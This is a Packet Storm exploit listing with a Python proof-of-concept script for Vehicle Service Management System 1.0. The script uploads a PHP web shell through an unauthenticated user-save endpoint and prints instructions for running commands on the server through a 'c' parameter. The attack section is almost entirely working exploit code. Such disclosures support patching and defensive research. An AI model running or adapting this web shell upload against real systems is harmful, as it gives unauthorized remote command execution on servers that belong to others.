exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Vehicle Service Managment System 1.0 Shell Upload

Vehicle Service Managment System 1.0 Shell Upload
Posted Oct 4, 2021
Authored by Richard Jones

Vehicle Service Management System version 1.0 unauthenticated remote shell upload exploit that uses authentication bypass with SQL injection.

tags | exploit, remote, shell, sql injection
SHA-256 | 6c102a236cb9e21f5427c1ae2c9ecec8289f62748f674b9bd2f0e484459314c2

Vehicle Service Managment System 1.0 Shell Upload

Change Mirror Download
# Exploit Title: Vehicle Service Managment 1.0 - RCE (Unauthenticated) 
# Date: 2021-10-02
# Exploit Author: RICHARD JONES
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10

import requests

HOST="http://localhost"
UPLOAD_URL="/vehicle_service/classes/Users.php?f=save"

s = requests.Session()

def sendShell():
payload = "<?php system($_GET['c']);?>"

data = {
"id":"1",
"firstname":"Adminstrator",
"lastname":"fake",
"username":"fake",
"password":"fake"
}

filedata = {"img":("shell.php",payload,
"image/png", {"Content-Disposition": "form-data"}
) }

prox = {"http":"http://127.0.0.1:8080"}

r = s.post(f"{HOST}{UPLOAD_URL}", data=data, proxies=prox, files=filedata)
if (r.status_code == 200):
print("[+] Shell upload successful")
print(f"[-] Check in {HOST}/vehicle_service/uploads/ for the shell")
print(f"[-] Usage: *shell.php?c=id")
print("[-] Ie: http://localhost/vehicle_service/uploads/{SERVERTIME}_shell.php?c=whoami")

def banner():
return r"""
__ _______ __ __ __ ___
\ \ / / ____| \/ | /_ | / _ \
\ \ / / (___ | \ / | | || | | |
\ \/ / \___ \| |\/| | | || | | |
\ / ____) | | | | | || |_| |
\/ |_____/|_| |_| |_(_)___/

"""

print(banner())
print("Vehicle Service Managment 1.0 RCE ~ Created by Richard Jones")
print("[+] Trying shell upload")
sendShell()
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close